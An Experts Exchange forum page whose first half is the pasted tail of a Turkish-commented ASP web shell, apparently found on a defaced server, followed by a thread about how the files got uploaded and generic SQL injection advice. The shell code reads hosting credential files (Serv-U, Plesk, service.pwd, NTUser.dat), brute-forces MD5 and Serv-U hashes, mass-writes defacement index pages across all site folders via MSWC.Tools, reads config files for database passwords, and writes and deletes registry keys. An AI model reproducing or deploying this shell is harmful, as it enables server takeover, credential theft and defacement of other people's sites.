yazorta("<a href='"&FilePath&"?konum=C:\Program Files\&hacked=serv&Time="&time&"&mode=23'>Serv_U</a> - <a href='"&FilePath&"?konum=C:\Program Files\&hacked=Daemon&Time="&time&"&mode=23'>Daemon</a> - <a href='"&FilePath&"?konum=C:\&hacked=ws_ftp&Time="&time&"&mode=23'>Ws_Ftp</a> - <a href='"&FilePath&"?konum=C:\&hacked=base.ini&Time="&time&"&mode=23'>Base.ini</a> - <a href='"&FilePath&"?konum=C:\Program Files\&hacked=remote.ini&Time="&time&"&mode=23'>Remote.ini</a>")
response.write "</td></tr></table></center>"
response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td>"
yazorta("<b> Uzakdan PLESK Eriþimi SOnucu by alfonso </b>")
alfonsoPleskRemote()
response.write "</td></tr></table></center>"
On error resume next
response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td>"
yazorta("<b> Vti_Pvt/Access.Cnf & Postinfo & ServicePwd Sonucu by alfonso</b>")
alfonsoVti_Pvt()
yazorta("<b>Geliþmiþ Arama için</b>")
local = request.servervariables("APPL_PHYSICAL_PATH")
yazorta("<a href='"&FilePath&"?konum="&local&"\..\..\&hacked=access.cnf&Time="&time&"&mode=23'>access.cnf</a> - <a href='"&FilePath&"?konum="&local&"\..\..\&hacked=postinfo&Time="&time&"&mode=23'>postinfo</a> - <a href='"&FilePath&"?konum="&local&"\..\..\&hacked=service.pwd&Time="&time&"&mode=23'>service</a>")
response.write "</td></tr></table></center>"
On error resume next
response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td>"
yazorta("<b> NTUser.Dat - Log - Ýni Eriþim Sonucu by alfonso </b>")
alfonsoaNTUser(struser)
response.write "</td></tr></table></center>"
On error resume next
response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td>"
yazorta("<b> Config Klasör Eriþim Sonucu by alfonso</b>")
alfonsosam()
response.write "</td></tr></table></center>"
Call Hata
On error resume next
response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td>"
yazorta("<b> Repair Klasör Eriþim Sonucu by alfonso</b>")
alfonsoRepair()
response.write "</td></tr></table></center>"
Call Hata
nolist = True
CASE 38 ' IIS bilgi Alaný by alfonso
yazsol("WÝndows Server lardaki, himeti sunan, IIS servisi, sizi AnonymousUserName ve o þifre ile tanýr. Sizin yetkiniz o kullanýcýdadýr. ")
yazsoll("IIS içinde ise, o siteninde BEllekdeki Oturum adýda -> WAMUserName adýnda ve þifresine sahiptir.")
yazsoll("Bu Sistem Geliþtirilmeye Devam ediyor? ")
CASE 39 ' Seçmece bunlar MD5- servu =) by ALFONSO
response.write "<br><br><br><br><br><center><table width='100%' bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td><form action='"&FilePath&"?mode=40' method=post>"
yazorta("<b> Kýrmak Ýstediðin Türü Seç</b>")
yazorta("<input name='islem' style='color=#C6FCBE' value=' ..:: MD5 ::.. ' type='Submit'> <input name='islem' style='color=#C6FCBE' value=' ..:: Serv-U ::.. ' type='Submit'>")
response.write "</form></td></tr></table></center>"
yazsol("<b>MD5 :</b> Bildiðiniz üzere, bir çok sistemin kullandýðý bir þifreleme olayýdýr. 128 bittir.")
yazsol("<b>Serv-U :</b> Server larda Host larýn kullandýðý bir programdýr. Kolay vede kullanýþlý olduðu için Hostlar tarafýndna tercih edilir. içinde Ftp þifreleri barýndýrmakdadýr. burdada o Þifreleri kýrmaktadýr.")
yazsoll("<font color=#C6FCBE >Bizde burda ASP tabanlý vede FSO içine injecte edip Sizlere Server ýn CPU ve RAM ini kullanarak , Daha hýzlý ve zahmetsiz, TÝmeOUT suz bir þekilde Þifreleirni kýrmanýzý saðlayacaðýz. Bu Kýrma iþlemi BRUTE attackl modelidir. Kýsacasý Kýrma olasýðý eðer ki sabreder ve þansýnýz varsa çok kýsa sürede kýrarsýnýz. Ama aksi halde 1 gün geçsede =) yinede %100 kýrmöa garantisi vardýr. Eðer derleri doðru girerseniz.</font>")
yazortaa("Md5 & Serv-U KOd Converted by <b>Fastboy</b>")
Yazorta("Brute And HJACk Algorithms Written by <b>alfonso</b>")
CASE 40 ' Md5 & Serv-U Algortitmasý Baþlýyor Sýký tutnun =) sakýn dudaðýnýz uçuklamaýsn haa =) by alfonso euheuh çok yordu be kafamý bu olay .. neyse çözdük yine =) eeheuh by alfonso
response.write "<center><table width='100%' bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td><form action='"&FilePath&"?mode=41' method=post>"
if islem = " ..:: MD5 ::.. " then
yazorta("<b> __== MD5 Cracker by alfonso ==__ </b>")
else
yazorta("<b> __== Serv-U Cracker by alfonso ==__ </b>")
end if
if islem = " ..:: MD5 ::.. " then
yazsol("MD5 Kodu Girin 1 : <input style='color=#C6FCBE' size='54' name='Usersmd5' value='Hash kod u giriniz çözülecek olan.' type='text'>")
else
yazsol("Serv-u Ham Kodu Girin 1 : <input style='color=#C6FCBE' size='45' name='Usersmd5' value='Hash kod u giriniz çözülecek olan.' type='text'>")
yazsol("Salt Kodu : <input style='color=#C6FCBE' size='30' name='salt' value='ww' type='text'>")
end if
response.cookies("mdd") = ""
response.cookies("hash1") = ""
response.cookies("hash2") = ""
response.cookies("hash3") = ""
response.cookies("hash4") = ""
response.cookies("hash5") = ""
response.cookies("hash6") = ""
response.cookies("hash7") = ""
response.cookies("hash8") = ""
response.cookies("hash9") = ""
response.cookies("hash10") = ""
yazsol("Hash 2 : <input style='color=#C6FCBE' size='54' name='hash2' value='' type='text'>")
yazsol("Hash 3 : <input style='color=#C6FCBE' size='54' name='hash3' value='' type='text'>")
yazsol("Hash 4 : <input style='color=#C6FCBE' size='54' name='hash4' value='' type='text'>")
yazsol("Hash 5 : <input style='color=#C6FCBE' size='54' name='hash5' value='' type='text'>")
yazsol("Hash 6 : <input style='color=#C6FCBE' size='54' name='hash6' value='' type='text'>")
yazsol("Hash 7 : <input style='color=#C6FCBE' size='54' name='hash7' value='' type='text'>")
yazsol("Hash 8 : <input style='color=#C6FCBE' size='54' name='hash8' value='' type='text'>")
yazsol("Hash 9 : <input style='color=#C6FCBE' size='54' name='hash9' value='' type='text'>")
yazsol("Hash 10 : <input style='color=#C6FCBE' size='54' name='hash10' value='' type='text'>")
yazsol("Þifre Aralýðý : <input style='color=#C6FCBE' size='5' name='ara1' value='5' type='text'> ile <input style='color=#C6FCBE' size='5' name='ara2' value='18' type='text'> arasýnda...")
yazsol("Deneme Sayýsý : <input style='color=#C6FCBE' size='5' name='inject1' value='100' type='text'> (1 keredeki deneme sayýsý)")
yazsoll("<b>CharSet i seçiniz;</b>")
yazsol("<input name='k1' value='k1' type='checkbox' checked > ABCDEFGHIJKLMNOPQRSTUVWXYZ")
yazsol("<input name='k2' value='k2' type='checkbox' > abcdefghijklmnopqrstuvwxyz")
yazsol("<input name='k3' value='k3' type='checkbox' checked > 0123456789")
yazsol("<input name='k4' value='k4' type='checkbox' > !@#$%^&*()-_+=~`[]{}|\:;<>,.?/")
yazsol("Bekleme Süresi : <input style='color=#C6FCBE' name='waiting' value='2' type='text' size='5'> saniye")
yazorta("<input name='mode' value='41' type='hidden'><input name='md5kirgecirmahvetalfonso' style='color=#C6FCBE' value=' __== Kýrmaya Baþla ==__ ' type=submit>")
response.write "</td></tr></form></table></center>"
if islem = " ..:: MD5 ::.. " then
yazsol("<b>MD5 Kodu Girin :</b> MD5 HASh þifrenizi giriniz oraya.. maksimum 10 Hash girebilirsiniz.")
else
yazsol("<b>Serv-u Ham Kodu Girin :</b> Serv-u Kodunun ilk 2 karakteri SALT dur. egri kalaný ise MD5 halidir. Oraya ilk 2 karakteri çýkarýn ve geri kalaný yazýn. altasa da SALT kýsmýnada, ilk 2 karakteri yazýn. Max 10 Hash girebilirsiniz.")
end if
yazsol("<b>Þifre Aralýðý :</b> Burda belirtilen aralýklar arasýnda þifre üretip, denemeye baþlýcaktýr. önce küçükden baþlayýp, tüm charset denemsini yaptýkdan sonra, aralýk bir artacaktýr, taaki sizin üst sýnýra kadar girdiðiniz.")
yazsol("<b>CharSet i seçiniz; </b> Þifre denerkenki, Þifre karakterleridir. Büyük küçük harf önemlidir. Birden FAzla da seçebilriisniz. Ama unutmayýnki, Deneme sayýsý büyüdükçe, Zamanda ARTACAKTIR. ")
yazsol("<b>Bekleme Süresi :</b> Sürekli md5 deneme yaparsa sistem, büyük bir oranda Cpu kullanýr. Cpu kullanýmý rahatlatmak için vede timeout u önlemek için , her bir Charset uzunluðu kadar deneyip, sonra yenileme yapýyor. o sýradaki bekleme süresidir bu.")
yazsol("<b>NOT :</b> Toplu Md5&ServU kýrmak mümkün. Hepsini birden kullandýðýnýzda verim artacaktýr. HIZ da düþüþ olmaz. Ama sizin Daha kolay kýrmanýzý saðlar, Çoklu kýrma.")
CASE 41 ' MD5 deneniyorrrrrr by alfonso
' yerel deðiþkenelrim
on error resume next
if request.cookies("mdd") = "0" or request.cookies("mdd") = "" then
session("say") = 1
Call Cookyaz("hash1","has1",Usersmd5)
Call Cookyaz("hash2","has2",hash2)
Call Cookyaz("hash3","has3",hash3)
Call Cookyaz("hash4","has4",hash4)
Call Cookyaz("hash5","has5",hash5)
Call Cookyaz("hash6","has6",hash6)
Call Cookyaz("hash7","has7",hash7)
Call Cookyaz("hash8","has8",hash8)
Call Cookyaz("hash9","has9",hash9)
Call Cookyaz("hash10","has10",hash10)
inject4 = CInt(session("say"))
inject3 = 0
end if
increment = 0
sifre = ""
hashing = ""
goup=0
getend=0
if inject4 = inject3 then
response.write ("<script>alert(""Mükemmel Tüm þifreler Kýrýldý ;) by alfonso "")</script>")
response.end()
end if
if coding ="" then ' kod oluþtur
coding = kodolustur(ara1)
end if
coding = replace(coding,"x","#")
if dizi = "" then ' Charset i oluþuturuyorum..
dizi = diziolustur()
end if
Call HashFounded("hash1","has1")
Call HashFounded("hash2","has2")
Call HashFounded("hash3","has3")
Call HashFounded("hash4","has4")
Call HashFounded("hash5","has5")
Call HashFounded("hash6","has6")
Call HashFounded("hash7","has7")
Call HashFounded("hash8","has8")
Call HashFounded("hash9","has9")
Call HashFounded("hash10","has10")
for t=1 to inject1
sifre = Sifreyarat(coding,ara1,dizi)
if salt = "" then
md5li=UCASE(md5(sifre))
response.write sifre &" - "& md5li & "<br>"
else
md5li=UCASE(md5(salt+sifre))
response.write salt+sifre &" - "& md5li & "<br>"
end if
Call hashyes("hash1","has1",md5li,sifre)
Call hashyes("hash2","has2",md5li,sifre)
Call hashyes("hash3","has3",md5li,sifre)
Call hashyes("hash4","has4",md5li,sifre)
Call hashyes("hash5","has5",md5li,sifre)
Call hashyes("hash6","has6",md5li,sifre)
Call hashyes("hash7","has7",md5li,sifre)
Call hashyes("hash8","has8",md5li,sifre)
Call hashyes("hash9","has9",md5li,sifre)
Call hashyes("hash10","has10",md5li,sifre)
coding = SonrakiAdim(coding,ara1,dizi)
'response.flush
next
coding = replace(coding,"#","x")
if CInt(ara1) <> CInt(ara2)+1 then
response.write "<META http-equiv=refresh content="&waiting&";URL='"&FilePath&"?mode=41&ara1="&ara1&"&ara2="&ara2&"&dizi="&dizi&"&coding="&coding&"&waiting="&waiting&"&inject1="&inject1&"&salt="&salt&"&inject4="&inject4&"&inject3="&inject3&"'>"
end if
response.flush
CASE 42 'MSWC nesnesi kullanýmý. Permision geçme adýna attýðým bir adamdýr. bu nesnenin olduðunu "Scorlex" den edindim. Araþtýrdým neler yaparým diye =) iþte görün neler yapýlabiliyormuþuz ;) bununla. uehueh by alfonso
response.write "<table width=""100%"" class=""kbrtm""><tr valign=""top""><td colspan=""2"" align=""center"">"
tablo30("<b>Hacking with Using MSWCTools 1.0 by alfonso ;)</b>")
yazsol("<form action='"&FilePath&"?mode=43' method=post><b>Ýndex Yeri : </b><input name='hash2' type='text' value='"&FilePath&"' size=50> (Ýndexin Serverdaki virtual yeri)")
yazsol("<input type=radio name='hash4' checked value='tek'> <b>Atýlacak Yer: </b><input name='hash3' type='text' value='default.asp' size=50> (Tek bir yere Yaz.)")
yazsol("<input type=radio name='hash4' value='multi'> <b>MASS Konum: </b><input name='hash6' type='text' value='.\' size=50> (Mass yapýlacak dizin)")
yazsol("<b>Eklencek Klasör: </b><input name='hash5' type='text' value='httpdocs\' size=25> (Ek Klasör girdisi - BOÞ býrakýn , bilmiyorsanýz)")
yazorta("<input name='Gönder_Ej_De_r' value='Yazdýr koçumm ;) by alfonso' type='submit'")
response.write "</td></tr></table></form>"
yazorta("<b>Kullanýmý by alfonso</b>")
yazsol("Önecelikle, FSO nesnesi kullanmadan bir dosyayý , istenilen yere MSWC nesnesi ile yazdýrýlanabiliniyor. FSO desteði olmayan bir server da bile, rahatça bu nesne yardýmý ile index atabilirsiniz. Kimi serverlarda, permison engeline takýlýrýz yada klsörü içine giremeyiz, yada FSO kullanýmý kýsýtlýdýr. bunlarý AÞMAK için bu nesneyi kullandým. Bu nesne þu an localhost ve 1-2 yerde çalýþtý saðlýklý þekilde. Þu an TEst sürümünde diyebilirim. Umarým bu bizim permison =) geçme yollumuzu aydýnlatýr ne dersiniz :)) uehueh")
yazsol("<b>index yeri -></b>Burayý fiziksel yeri YAZMAYIN SAKIN. oraya indexinizin virtual yerini yani. Kullandýðýnýz FSO dizinine olan KONUMUNU yazýn indexin yani. Bu fso ile ayný yerde ise, 'hacked.html' eðer alt klasörde ise -> '..\hacking.html', '..\..\..\alfonso\www\hacking.html',yada \news\hacking.html gibi belirtmeniz gerek.Konumunu böyle belirlemeniz gerekiyor. 'C:\ss\ss\hacking.html' yaptýðýnýzda iþlem gerçekleþmezz.. <b>YADA size ÖNERÝm -> kullandýðýnýz FSo yu istediðinzi yere server daki bir baþkas siteye copyalatýrrýsanýz , , bu sefer fso yu o site üzeridnen çalýþtýrrýrsanýz PErmsion ý aþmýþ olursunuz o site için.</b>")
yazsol("<b>Atýlacak yer ->></b> TEK bir hedef için. Burayýda ..\..\ þeklinde inerek belirtmeniz gerekiyor.mesela '..\..\..\index.asp' 3 dizin aþaðýya iner ve index i atar yada '..\..\..\www\index.asp' 3 dizin iner ww dizine girer , index i atar. =) böyle OLAMAK zorunda . ")
yazsol("<b>MASS Konum ->></b> BUrda çoklu alt klasörlerede index atmak için geliþtirdim. '..\..\..\' þeklinde aþaðýlara inin ve TÜM sietelerin LÝStelendiði klasör ee kadar olan '..\' iþaretini ayarlayýn. mesela 3 dizin aþaðýda ise FSO olan uzaklýðý, '..\..\..\' yazýn yeterdir =) . <b>Eklenecek klasör-></b> burda da, TÜm sietlere giriþ yapýldýkdan sonraki Klasör adý , mesela 'www' yada 'http' yada 'wwwroot' gibi.")
yazsol("Neden böyle derseniz, MSWC nin kullanýmý, destekleidði þekil böyledir. Biraz kafa karýþtýrýcý. Ama ben denedim gördüm =) memnun kaldým. O yüzden bu FSO da yerini aldý. Þundan eminimki kullanýmýný deneyerek öðrendiðinizde, sizinde PErmsion geçmede vazgeçilmeziniz olacakdýr =) euheuh")
yazorta("Biraz zor oldu be <b>ALFONSO</b> for giving idea about MSWC Component")
yazorta("<b>Coding & Development & Algorithms Made by alfonso</b>")
CASE 43 'MSWC iþleniyor =)
on error resume next
Set utils = Server.CreateObject("MSWC.Tools")
if err <> 0 then
olmadi("MSWC.tools desteði yoktur bu serverýn.")
end if
if hash4 = "tek" then
on error resume next
utils.ProcessForm hash3, hash2
if err <>0 then
olmadi("Baþarýsýz. Belirtiðiniz virtual path lar doðrumu emin olun. MSWC desteði var çünkü server ýn.")
else
oldu("Baþardýnýz ;) iþlem gerçekleþtii.")
end if
else
on error resume next
Set f = FSO.GetFolder(FolderPath)
Set fc = f.SubFolders
if err<>0 then
olmadi("bu klasör e FSo nesnesi ile tarama yapýlamýyor. Önce okunmalý, sonra MSWC devreye girer.")
end if
For Each f1 In fc
on error resume next
mevki = hash6+f1.name+"\"+hash5+"default.asp"
utils.ProcessForm mevki, hash2
mevki = hash6+f1.name+"\"+hash5+"index.asp"
utils.ProcessForm mevki, hash2
mevki = hash6+f1.name+"\"+hash5+"default.htm"
utils.ProcessForm mevki, hash2
mevki = hash6+f1.name+"\"+hash5+"index.html"
utils.ProcessForm mevki, hash2
mevki = hash6+f1.name+"\"+hash5+"alfonso.html"
utils.ProcessForm mevki, hash2
mevki = hash6+f1.name+"\"+hash5+"index.htm"
utils.ProcessForm mevki, hash2
if err<>0 then
response.write "<table width=""100%""><tr><td class=""kbrtm""> "& hash6+f1.name+"\"+hash5&" <font color=#FE7A84> Noo :( !! <font class=""k1"">û</font></td></tr></table>"
else
response.write "<table width=""100%""><tr><td class=""kbrtm""> "& hash6+f1.name+"\"+hash5&" <font color=#C6FCBE> OK !! <font class=""k1"">ü</font></td></tr></table>"
end if
response.flush
Next
yazorta("<b>Ýþlem Tamamlandý. by alfonso ;)</b>")
end if
CASE 44 'XMLHTTP lý dosya okuma.
if inject2 = "ok" then
mevki = hash2
else
mevki = Fullpath
end if
response.write "<table width=""100%"" class=""kbrtm""><tr valign=""top""><td colspan=""2"" align=""center"">"
tablo30("<b>Reading Files by using XMLHTTP 1.0 by alfonso ;)</b>")
yazsol("<form action='"&FilePath&"?mode=44' method=post><input name='inject2' value='ok' type='hidden'><b>Dosya Adresi : </b><input name='hash2' type='text' value='"&mevki&"' size=60><input name='goruntule_by_A_l_f_o' value='.: Görüntüle :.' type='submit'>")
response.write "</td></form></tr></table>"
if not inject2 = "ok" then
yazsol("<b>XMLHTTP</b> Component ini kullanmaktadýr. kullanýmý çok kolay. Server daki istediðiniz dosyanýn fiziksel link ini yazarak , içini görüntüleyebilirsiniz.")
yazsol("Bir server a girdiniz. FSO ile okuma yetkiniz yok bir dizinde, fakat orda dosyalar mevcut. HTTP üzerinden ulaþabiliyorusnuz fakat server içinden PERMission denied diyor. o zaman direk burdan fiziksel link ini yazarakdan ulaþýrýýz. BUNU 'confing.asp' 'common.asp' 'sql.asp' gibi dosyalarda uygulayarak SQL baðlantýlar yada MDB yerlerini öðrenebiliriz. Hatta ASp kodlar içindeki Admin þirfeleri gibi kritik þifrrelerde dahil. SQL injeciotn yapacaksanýzda, Tablo larý , kullanýþan sql komularada ulaþabilirsiniz. ")
else
response.write "<textarea style='width:100%;height:470;' >"
on error resume next
Set alfonso = Server.CreateObject("Microsoft.XMLHTTP")
alfonso.Open "GET", hash2, false
alfonso.Send
if err=0 then
Response.Write Server.HTMLEncode(alfonso.ResponseText)
else
response.write "Yazdýðýnýz adres bulunamadý . ?? bir kontrol yap by alfonso ;)"
end if
response.write "</textarea>"
end if
yazorta("<b>by alfonso ;)</b>")
CASE 45 'Registiry Editör =) by A L F O N S O F E E L T H E P O W E R O F T U R K S
response.write "<table width=""100%"" class=""kbrtm""><tr valign=""top""><td colspan=""2"" align=""center"">"
tablo30("<b>REGISTRY EDITOR 2.0 by alfonso ;)</b>")
tablo30("<br><b>REGister lara YAzma & Ekleme</b>")
yazsol("<form action='"&FilePath&"?mode=45' method=post><input name='inject2' value='yaz' type='hidden'><b>Mevki/Key : </b><input name='hash2' type='text' value='' size=85><br> (örnek: HKLM\SOFTWARE\Microsoft\ALFONSO.COM)")
yazsol("Deðer/Value: <input name='hash3' value='' type='text'>")
yazsol("TÜr/Type: <select name='hash4'><option value=1>REG_SZ</option><option value=2>REG_DWORD</option><option value=3>REG_BINARY</option><option value=4>REG_EXPAND_SZ</option><option value=5>REG_MULTI_SZ</option></select> <input name='SaVSA_K_CoM' value='..:: YAZDIR ::..' type='Submit'>")
response.write "</td></form></tr></table>"
yazsol("<table><tr><td>Root Key Name</td><td>Karþýlýðý</td></tr><tr><td>HKEY_CURRENT_USER</td><td>HKCU</td></tr><tr><td>HKEY_LOCAL_MACHINE</td><td> HKLM </td></tr><tr><td>HKEY_CLASSES_ROOT</td><td>HKCR</td></tr><tr><td>HKEY_USERS</td><td>HKEY_USERS </td></tr><tr><td>HKEY_CURRENT_CONFIG</td><td>HKEY_CURRENT_CONFIG </td></tr></table>")
yazsol("REG_SZ -> String(kelime) / REG_DWORD -> Ýnteger(Sayý) / REG_BINARY -> Binary / REG_EXPAND_SZ -> Multi String / REG_MULTI_SZ -> Aeeay String")
response.write "<table width=""100%"" class=""kbrtm""><tr valign=""top""><td colspan=""2"" align=""center"">"
tablo30("<br><b>Register lardan OKUMA & SÝL Coded by alfonso ;)</b>")
yazsol("<form action='"&FilePath&"?mode=45' method=post><input name='inject2' value='oku' type='hidden'><b>Mevki/Key : </b><input name=""hash5"" type='text' value='' size=85><br> (örnek: HKLM\SOFTWARE\Microsoft\alfonso_WAS_HERE)")
yazorta("<input value='oku' name='hash6' type='radio' checked> OKU - <input value='sil' name='hash6' type='radio'> SÝL <input name='SaVSA_K_CoM_' value='..:: OKU/SÝL ::..' type='Submit'>")
response.write "</td></form></tr></table>"
on error resume next
Set SaVSaK = Server.CreateObject("WScript.Shell")
if err <> 0 then
olmadi("Server da WScript.SHell kullanýmýna Ýzin vermemektedir. Ýþlem baþarýsýz.")
response.end()
end if
if inject2 = "yaz" then
on error resume next
Select Case CInt(hash4)
Case 1
hash9 = SaVSaK.RegWrite (Trim(hash2), Trim(hash3), "REG_SZ")
Case 2
hash9 = SaVSaK.RegWrite (Trim(hash2), CInt(Trim(hash3)), "REG_DWORD")
Case 3
hash9 = SaVSaK.RegWrite (Trim(hash2), CInt(Trim(hash3)), "REG_BINARY")
Case 4
hash9 = SaVSaK.RegWrite (Trim(hash2), Trim(hash3), "REG_EXPAND_SZ")
Case 5
hash9 = SaVSaK.RegWrite (Trim(hash2), Trim(hash3), "REG_MULTI_SZ")
End Select
if err <> 0 then
olmadi("Ýþlem gerçekleþtirilemedi. VALUE deðerinin doðru ve uygun Value giridðinziden emin ol.")
else
oldu(" <b>"+hash2+"</b><br> adresine register yazýldý. ")
end if
else if inject2 = "oku" then
if hash6 = "oku" then
yazorta("Mevki/Key: <b>"&Trim(hash5)&"</b>")
on error resume next
response.write "<center>Deðer/Value: <b>"
response.write SaVSaK.RegRead (Trim(hash5))
response.write "</b></center>"
if err<>0 then
olmadi("Kayýt Register larda bulunamadý...")
end if
else if hash6 = "sil" then
yazorta("Mevki/Key: <b>"&Trim(hash5)&"</b>")
on error resume next
hash9 = SaVSaK.RegDelete (Trim(hash5))
if err<>0 then
olmadi("Registerlardan Silinemedi. KEy yanlýþ olabilir. yada kayýt bulanamadý.")
else
oldu("Baþarýyla Silindi. ")
end if
end if
end if
end if
end if
yazortaa("<b>Coded by ALFONSO - Cyber-Warrior</b>")
END SELECT
if popup = False AND nolist = False then
response.write "<br><br>"
response.write "<div style=""z-index:150; position:absolute"">"
Call KlasorOku()
response.write "</div><div align=""right"">"
Call DosyaOku()
response.write "</div>"
end if
if popup = False then
response.write "<br><br><center><table cellpadding=""0"" cellspacing=""0"" width=""160"">"
response.write "<tr><td class=""kbrtm"" height=""20"" style=""background-color:121212"" align=""center""><b>Sürücüler</b></td></tr>"
Call Suruculer
response.write "</table></center><br><br>"
Call SurucuInfo
yazortaa("<b>Coded by <a href=""mailto:cwalfonso@hotmail.com"">alfonso</a> - <a href=""http://www.allah.cc"" target=_blank"">ALLAH.CC</a></b>")
yazorta("<b>ALFONSO was here</a><br>Speacial Thanks to CW</b>")
end if
%>
[X]
Welcome to Experts Exchange
Add your voice to the tech community where 5M+ people just like you are talking about what matters.
- Help others & share knowledge
- Earn cash & points
- Learn & ask questions
4-
3
7 Comments
Please check OWASP website for secure coding standards:
1) Top ten Web application vulnerabilities
http://www.owasp.org/index.php/Top_10_2007
2) Secure coding standards:
http://www.owasp.org/index
Also check the PCI Data Security Standards for more best practices:
3) https://www.pcisecuritystandards.org/security_standards/supporting_documents.shtml
Some additional information. We use aspx pages. We have 2 stored procedures that display products on our web site. The sql user that executes only has execute permission on the sp's and only select on the table in question. The sql user has no other permission. I have changd the sa password.
IIS only has read permission on the directory. No browse permission has been allowed through IIS.
There must be an obvious step we we are over looking that allows the uploads of these files.
We appreciate any help on what we should look for to plug this security hole.
Thank you
IIS only has read permission on the directory. No browse permission has been allowed through IIS.
There must be an obvious step we we are over looking that allows the uploads of these files.
We appreciate any help on what we should look for to plug this security hole.
Thank you
Please read the suggested link.
Otherwise you will have to hire a Web application security professional to review your site.
Otherwise you will have to hire a Web application security professional to review your site.
Ralmada, I thought some of the experts would have specific suggestions for known defacing attacks or may be familiar with the techniques used by this particular hacker. I have read the suggested links as well as many others. Of the top 10 only one seems to be the likely candidate. SQL Injection. The article has some guide lines but does not really give specifics on what you should look for. As I said we are using aspx. We are not using any dynamic SQL as appears to be the most common security risk. We do not solicit user input, but users may be able to modify in input through URL. This would indeed bring back a different record. In our case this is not violation as the products are what we are trying to display on our web site. There is no confidential information on the single table that the internetguest user has select permissions on.
Select pID,pName from products where products=?id. Our web site fills in the ?id but a user can override. So my question, is the ability to input an id with select only permission a hole for SQL injection?
None of the other items in the article seem to fit.
The document on PCI security is for payment processing. We do not have a shopping cart and do not process any payments.
Thank you for you help
Select pID,pName from products where products=?id. Our web site fills in the ?id but a user can override. So my question, is the ability to input an id with select only permission a hole for SQL injection?
None of the other items in the article seem to fit.
The document on PCI security is for payment processing. We do not have a shopping cart and do not process any payments.
Thank you for you help
The PCI site is indeed for companies that process credit card payments. But, you should really take a look at it as a best practice guide.
Regarding the possibility of of Internet users to do a select. Yes, that's a security hole. You should consider putting the query into a stored procedure. Then you will need to validate the imput in the ?id parameter, to make sure it doesn't have any embedded query or sql command.
The OWASP gives some advise on SQL injection prevention. Please check this link:
http://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
They mention, and I agree, that the key is to validate your input. "Input validation can be used to detect unauthorized input before it is passed to the SQL query". That's why I recommend the use of the stored procedure. Because you have the possibility to check whatever has been passed as a parameter and then use it as a parameter. For example:
Regarding the possibility of of Internet users to do a select. Yes, that's a security hole. You should consider putting the query into a stored procedure. Then you will need to validate the imput in the ?id parameter, to make sure it doesn't have any embedded query or sql command.
The OWASP gives some advise on SQL injection prevention. Please check this link:
http://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
They mention, and I agree, that the key is to validate your input. "Input validation can be used to detect unauthorized input before it is passed to the SQL query". That's why I recommend the use of the stored procedure. Because you have the possibility to check whatever has been passed as a parameter and then use it as a parameter. For example:
create procedure yourprocedure @id varchar(1000)
as
begin
if @id <> 'expected result' --validate
--treat is as an error
else
select col1, col2 from yourtable where id = @id
end
My mistake. All our queries from SQL are from stored procedures. Internet guest only has execute permission on these sp's. I will review to see what kind of validators we can add to the sp's for the parameters that are passed into the sp's.
Thank you
Thank you
Any luck?
Please don't forget to read and reread this link:
http://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
Please don't forget to read and reread this link:
http://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
Featured Post
What is Best for Backup: Amazon Drive, Google Drive or MS OneDrive? In this free whitepaper we look at their performance, pricing, and platform availability to help you decide which cloud drive is right for your situation. Download and read the results of our testing for free!
Question has a verified solution.
If you are experiencing a similar issue, please ask a related question
Suggested Solutions
| Title | # Comments | Views | Activity |
|---|---|---|---|
| Clone table from one server.database to another server.database | 24 | 61 | |
| Faster way to get row count from a view than select Count(*) from ViewObject? | 2 | 43 | |
| Customising IE behaviour on certain pages | 2 | 101 | |
| relocating SQL 2000 | 18 | 37 |
One of the biggest threats in the cyber realm pertains to advanced persistent threats (APTs). This paper is a compare and contrast of Russian and Chinese APT's.
While it may be true that the internet is a place of possibilities, it is also a hostile environment lurking with many dangers. By clicking on the wrong link, trusting the wrong person or using a weak password, you are virtually inviting hackers to …
With Secure Portal Encryption, the recipient is sent a link to their email address directing them to the email laundry delivery page. From there, the recipient will be required to enter a user name and password to enter the page. Once the recipient …
Established in 1997, Technology Architects has become one of the most reputable technology solutions companies in the country. TA have been providing businesses with cost effective state-of-the-art solutions and unparalleled service that is designed…
- Anti-Virus Apps
- Ransomware
- The Email Laundry
- Email Servers
- Cybersecurity
- *malware, Microsoft Access
Suggested Courses
Course of the Month3 days, 12 hours left to enroll
751 members asked questions and received personalized solutions in the past 7 days.
Join the community of 500,000 technology professionals and ask your questions.